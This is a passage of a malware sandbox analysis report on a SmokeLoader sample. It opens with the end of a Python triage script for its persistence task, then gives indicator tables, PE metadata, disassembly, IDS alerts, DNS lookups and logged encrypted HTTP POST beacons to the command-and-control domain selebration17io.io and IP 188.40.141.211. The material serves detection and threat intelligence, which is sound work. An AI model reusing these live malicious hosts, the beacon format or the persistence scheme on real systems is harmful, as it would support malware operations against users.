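REPORT_TASK = ScheduledTask("Firefox Default Browser Agent E9356D34AD307885",
                            r"C:\Users\user\AppData\Roaming\ifvwgru")
REPORT_ADS = b"[ZoneTransfer]\r\nZoneId=0\r\n"

if __name__ == "__main__":
    for finding in triage(REPORT_TASK, REPORT_ADS):
        print("-", finding)
```

On the report's task and stream the triage returns five findings; on a real Firefox agent task (action under Program Files, .exe extension) with a ZoneId=3 stream carrying a HostUrl it returns none. The checks are name-agnostic on purpose: the next build will use a different eight-letter file name and a different hex suffix, while the Roaming-path, no-extension and ZoneId=0 traits stay.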
    Context for IP 188.40.141.211 (other analyses that contacted it)
    Associated Sample Name / URL | Detection | Threat Name | Context
    Qi4Mj8hG3t.exe | malicious | SmokeLoader | selebration17io.io/index.php
    br0A8E2X6I.exe | malicious | SmokeLoader | selebration17io.io/index.php
    setup.exe | malicious | Babuk, Djvu | zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
    SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | malicious | SmokeLoader | agressivemnaiq.xyz/
    A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
    be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exe | malicious | SmokeLoader | host-data-coin-11.com/
    EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
    LisectAVT_2403002B_303.exe | malicious | Bdaejec, SmokeLoader | aucmoney.com/upload/
    LisectAVT_2403002C_47.exe | malicious | SmokeLoader | trad-einmyus.com/index.php
    EF48AEBC0F1E77208BBCD5206C58678BB1181994507D1084E1D324DCA9D5D3B8.exe | malicious | Bdaejec, SmokeLoader | host-data-coin-11.com/
    Context for domain selebration17io.io (other analyses that contacted it; note that the same domain previously resolved to 91.215.85.120, so the domain is the more durable indicator)
    Associated Sample Name / URL | Detection | Threat Name | Context
    Qi4Mj8hG3t.exe | malicious | SmokeLoader | 188.40.141.211
    br0A8E2X6I.exe | malicious | SmokeLoader | 188.40.141.211
    987123[1].exe | malicious | Bdaejec, SmokeLoader | 188.40.141.211
    Vjt694rffx.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 91.215.85.120
    ak55ZgXKwt.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz | 91.215.85.120
    tZksysDKeT.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz | 91.215.85.120
    woM8Z8CFYx.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc | 91.215.85.120
    6t0abj5L0W.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz | 91.215.85.120
    UUVupNLfBb.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz | 91.215.85.120
    FNzQAE7DvU.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5Systemz | 91.215.85.120
    Context for ASN HETZNER-ASDE (other analyses with traffic to this ASN)
    Associated Sample Name / URL | Detection | Threat Name | Context
    Qi4Mj8hG3t.exe | malicious | SmokeLoader | 188.40.141.211
    br0A8E2X6I.exe | malicious | SmokeLoader | 188.40.141.211
    53QoH91Zg3.exe | malicious | Unknown | 88.99.2.111
    7GfciIf7ys.exe | malicious | Unknown | 213.239.213.220
    2pFytt52ws.exe | malicious | Unknown | 95.216.22.24
    53QoH91Zg3.exe | malicious | Unknown | 195.201.62.78
    http://manga-netflix10737.tinyblogging.com.xx3.kz/ | malicious | Unknown | 138.201.139.144
    https://monogogo.info/JQJMLAWN#em=npaladino@bigge.com | malicious | Phisher | 46.4.15.55
    http://www.lesliehawes.com | malicious | Unknown | 135.181.16.82
    KKveTTgaAAsecNNaaaa.sh4.elf | malicious | Unknown | 46.4.110.10
    Process:C:\Windows\explorer.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):171008
    Entropy (8bit):6.91421044707207
    Encrypted:false
    SSDEEP:3072:fW29LkwhSw/x6rO8zjODXz4QMmKdXNPZfu0ICVy45Wr6QL:f39Llp/6O8zjODLMmKdXNI0ICVer6
    MD5:5C86694B89A930B319F453E541D17869
    SHA1:3E476F9253D814620A2FA2B9BD19374D420A3C67
    SHA-256:49B527DACC10E6D0E9D2924ECC4E59A8D727D5A2EB89AEA324D303F4C8E7BA28
    SHA-512:F6C8913125E2F93D73C6358149398D49CA8703D8032DC8EE6314F9B6803C7A96CBF4DFDC3AC82D67B29F222E37114885F27402BCFC6688C0A5BD98B7C08CFE7A
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 74%
    • Antivirus: Virustotal, Detection: 77%, Browse
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...I..d......................n...................@.......................... p.....1...........................................(.....o.8Z..........................................................h...@...............@............................text............................... ..`.rdata...(.......*..................@..@.data....m......J..................@....rsrc...8Z....o..\...@..............@..@........................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Windows\explorer.exe
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:true
    Reputation:high, very likely benign file
    Preview:[ZoneTransfer]....ZoneId=0
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):6.91421044707207
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.94%
    • Clipper DOS Executable (2020/12) 0.02%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • VXD Driver (31/22) 0.00%
    File name:vwaoMjcyAw.exe
    File size:171'008 bytes
    MD5:5c86694b89a930b319f453e541d17869
    SHA1:3e476f9253d814620a2fa2b9bd19374d420a3c67
    SHA256:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28
    SHA512:f6c8913125e2f93d73c6358149398d49ca8703d8032dc8ee6314f9b6803c7a96cbf4dfdc3ac82d67b29f222e37114885f27402bcfc6688c0a5bd98b7c08cfe7a
    SSDEEP:3072:fW29LkwhSw/x6rO8zjODXz4QMmKdXNPZfu0ICVy45Wr6QL:f39Llp/6O8zjODLMmKdXNI0ICVer6
    TLSH:7EF3BE21B9F2903EE6F796B5593196E05E3FBC636AB4818F3254136E0E322D04F25763
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...I..d...........
    Icon Hash:63796de961436e0f
    Entrypoint:0x4018b3
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x6402DE49 [Sat Mar 4 05:59:37 2023 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:85f4f1401ca36bd82fd51e7dd1026f90
    Instruction
    call 00007F6DDCC08869h
    jmp 00007F6DDCC0690Eh
    mov edi, edi
    push ebp
    mov ebp, esp
    mov eax, dword ptr [ebp+08h]
    mov dword ptr [0042584Ch], eax
    pop ebp
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    sub esp, 00000328h
    mov eax, dword ptr [0042129Ch]
    xor eax, ebp
    mov dword ptr [ebp-04h], eax
    and dword ptr [ebp-00000328h], 00000000h
    push ebx
    push 0000004Ch
    lea eax, dword ptr [ebp-00000324h]
    push 00000000h
    push eax
    call 00007F6DDCC06F9Ch
    lea eax, dword ptr [ebp-00000328h]
    mov dword ptr [ebp-000002D8h], eax
    lea eax, dword ptr [ebp-000002D0h]
    add esp, 0Ch
    mov dword ptr [ebp-000002D4h], eax
    mov dword ptr [ebp-00000220h], eax
    mov dword ptr [ebp-00000224h], ecx
    mov dword ptr [ebp-00000228h], edx
    mov dword ptr [ebp-0000022Ch], ebx
    mov dword ptr [ebp-00000230h], esi
    mov dword ptr [ebp-00000234h], edi
    mov word ptr [ebp-00000208h], ss
    mov word ptr [ebp-00000214h], cs
    mov word ptr [ebp-00000238h], ds
    mov word ptr [ebp-0000023Ch], es
    mov word ptr [ebp-00000240h], fs
    mov word ptr [ebp-00000244h], gs
    pushfd
    pop dword ptr [ebp-00000210h]
    mov eax, dword ptr [ebp+04h]
    lea ecx, dword ptr [ebp+04h]
    mov dword ptr [ebp-000002D0h], 00010001h
    mov dword ptr [ebp+00000000h], eax
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20194 | 0x28 | .rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x26fc000 | 0x5a38 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1e180 | 0x1c | .rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1fb68 | 0x40 | .rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x1e000 | 0x140 | .rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x1c7e6 | 0x1c800 | 698be3d06b11144f323de0083dcbb243 | False | 0.8944198876096491 | data | 7.821971719130902 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata | 0x1e000 | 0x28ce | 0x2a00 | 15eae4e9073e47b9fa0bc4b21890024f | False | 0.36300223214285715 | data | 5.400101138961297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data | 0x21000 | 0x26da2dc | 0x4a00 | bb59a2891a3111b839a260a6ec34f912 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc | 0x26fc000 | 0x5a38 | 0x5c00 | b5b59404fe4c3237626480fe795ec993 | False | 0.4263332201086957 | data | 4.087054066646391 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
    RT_CURSOR | 0x26ff4d8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375
    RT_CURSOR | 0x26ff608 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635
    RT_ICON | 0x26fc390 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | | | 0.5345622119815668
    RT_ICON | 0x26fca58 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.4117219917012448
    RT_ICON | 0x26ff000 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.44592198581560283
    RT_STRING | 0x26ff8a0 | 0x62e | data | | | 0.42983565107458915
    RT_STRING | 0x26ffed0 | 0x45e | data | | | 0.4561717352415027
    RT_STRING | 0x2700330 | 0x550 | data | | | 0.4389705882352941
    RT_STRING | 0x2700880 | 0x886 | data | | | 0.41200733272227313
    RT_STRING | 0x2701108 | 0x584 | data | | | 0.44192634560906513
    RT_STRING | 0x2701690 | 0x3a8 | data | | | 0.4636752136752137
    RT_ACCELERATOR | 0x26ff498 | 0x40 | data | | | 0.890625
    RT_GROUP_CURSOR | 0x26ff6b8 | 0x22 | data | | | 1.0588235294117647
    RT_GROUP_ICON | 0x26ff468 | 0x30 | data | | | 0.9375
    RT_VERSION | 0x26ff6e0 | 0x1bc | data | | | 0.5630630630630631
    DLL | Import
    KERNEL32.dll | SetVolumeLabelA, SetComputerNameExA, InterlockedIncrement, InterlockedDecrement, CreateJobObjectW, QueryDosDeviceA, SetCommBreak, GetTickCount, EnumResourceTypesA, GetModuleFileNameW, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, AttachConsole, VirtualAlloc, LoadLibraryA, WriteConsoleA, LocalAlloc, MoveFileA, RemoveDirectoryW, FindNextChangeNotification, GlobalFindAtomW, FindFirstVolumeMountPointA, GetModuleHandleA, GetConsoleTitleW, GetFileAttributesExW, FatalAppExitA, GetCurrentProcessId, AddConsoleAliasA, DeleteFileA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, RaiseException
    Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
    2024-08-21T07:12:54.073227+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    2024-08-21T07:12:32.808611+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    2024-08-21T07:12:54.307863+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    2024-08-21T07:12:33.042264+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 21, 2024 07:12:32.161120892 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.166003942 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.166152954 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.166377068 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.166439056 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.171164989 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.171200037 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.799855947 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.808610916 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.808644056 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:32.813435078 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.813446999 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:32.996936083 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:33.042263985 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:53.866307974 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:53.866353989 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:53.871324062 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:53.871340036 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:54.059181929 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:54.073226929 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:54.073259115 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:12:54.078010082 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:54.078250885 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:54.265165091 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:12:54.307862997 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:14:09.878695965 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Aug 21, 2024 07:14:09.878817081 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:14:09.884497881 CEST | 49717 | 80 | 192.168.2.6 | 188.40.141.211
    Aug 21, 2024 07:14:09.889363050 CEST | 80 | 49717 | 188.40.141.211 | 192.168.2.6
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 21, 2024 07:12:31.694510937 CEST | 55670 | 53 | 192.168.2.6 | 1.1.1.1
    Aug 21, 2024 07:12:32.159795046 CEST | 53 | 55670 | 1.1.1.1 | 192.168.2.6
    Aug 21, 2024 07:12:40.033972025 CEST | 53 | 64227 | 162.159.36.2 | 192.168.2.6
    Aug 21, 2024 07:12:40.500245094 CEST | 61739 | 53 | 192.168.2.6 | 1.1.1.1
    Aug 21, 2024 07:12:40.507380009 CEST | 53 | 61739 | 1.1.1.1 | 192.168.2.6
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Aug 21, 2024 07:12:31.694510937 CEST | 192.168.2.6 | 1.1.1.1 | 0xe17b | Standard query (0) | selebration17io.io | A (IP address) | IN (0x0001) | false
    Aug 21, 2024 07:12:40.500245094 CEST | 192.168.2.6 | 1.1.1.1 | 0xac09 | Standard query (0) | 56.126.166.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Aug 21, 2024 07:12:32.159795046 CEST | 1.1.1.1 | 192.168.2.6 | 0xe17b | No error (0) | selebration17io.io | | 188.40.141.211 | A (IP address) | IN (0x0001) | false
    Aug 21, 2024 07:12:40.507380009 CEST | 1.1.1.1 | 192.168.2.6 | 0xac09 | Name error (3) | 56.126.166.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
    • atahmsiplorwquuw.net
      • selebration17io.io
    • brprnhfudhwwlf.org
    • mwqxqnqsqljxlnw.org
    • aeuothcasbr.com
    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    0 | 192.168.2.6 | 49717 | 188.40.141.211 | 80 | 4004 | C:\Windows\explorer.exe
    Timestamp | Bytes transferred | Direction | Data
    Aug 21, 2024 07:12:32.166377068 CEST | 288 | OUT | POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://atahmsiplorwquuw.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 323
    Host: selebration17io.io
    Aug 21, 2024 07:12:32.166439056 CEST | 323 | OUT | Data Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f7 d9 52 d4
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bOR<##Z!I1=,NkfmsI]4y>6+3C8E&~{X[I})<}e?i|q9DO':P:2Nk..d]U
    Aug 21, 2024 07:12:32.799855947 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:32 GMT
    Data Raw: 03 00 00 00 1f 3d 19
    Data Ascii: =
    Aug 21, 2024 07:12:32.808610916 CEST | 286 | OUT | POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://brprnhfudhwwlf.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 357
    Host: selebration17io.io
    Aug 21, 2024 07:12:32.808644056 CEST | 357 | OUT | Data Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 c8 8a 14 62 cd d6 4f 96 a0 de 2d a9
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bO-"o*q:c[%]i*=QN/P?lu-uSah1<'U,D3+if_uojH.PiE0lHu7MSH7o~X-kl
    Aug 21, 2024 07:12:32.996936083 CEST | 144 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:32 GMT
    Aug 21, 2024 07:12:53.866307974 CEST | 287 | OUT | POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://mwqxqnqsqljxlnw.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 364
    Host: selebration17io.io
    Aug 21, 2024 07:12:53.866353989 CEST | 364 | OUT | Data Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fe aa 4c da
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bOL3e5g.4t0B<$*7I,@`&]!:n"L-7Bm-DY9W.U&tE)"bY-;JJ%BH<83xB={aJ=o,
    Aug 21, 2024 07:12:54.059181929 CEST | 151 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:53 GMT
    Data Raw: 03 00 00 00 1f 3d 19
    Data Ascii: =
    Aug 21, 2024 07:12:54.073226929 CEST | 283 | OUT | POST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://aeuothcasbr.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 168
    Host: selebration17io.io
    Aug 21, 2024 07:12:54.073259115 CEST | 168 | OUT | Data Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 c8 8a 14 62 cd d6 4f 96 e8 ac 40 c4
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bO@sl.!uaB8&20rN5ZRszM6/C+oL
    Aug 21, 2024 07:12:54.265165091 CEST | 144 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:54 GMT


    Target ID:0
    Start time:01:12:08
    Start date:21/08/2024
    Path:C:\Users\user\Desktop\vwaoMjcyAw.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\vwaoMjcyAw.exe"
    Imagebase:0x400000
    File size:171'008 bytes
    MD5 hash:5C86694B89A930B319F453E541D17869
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    Target ID:2
    Start time:01:12:13
    Start date:21/08/2024
    Path:C:\Windows\explorer.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\Explorer.EXE
    Imagebase:0x7ff609140000
    File size:5'141'208 bytes
    MD5 hash:662F4F92FDE3557E86D110526BB578D5
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
    Reputation:high
    Has exited:false

    Target ID:6
    Start time:01:12:31
    Start date:21/08/2024
    Path:C:\Users\user\AppData\Roaming\ifvwgru
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Roaming\ifvwgru
    Imagebase:0x400000
    File size:171'008 bytes
    MD5 hash:5C86694B89A930B319F453E541D17869
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
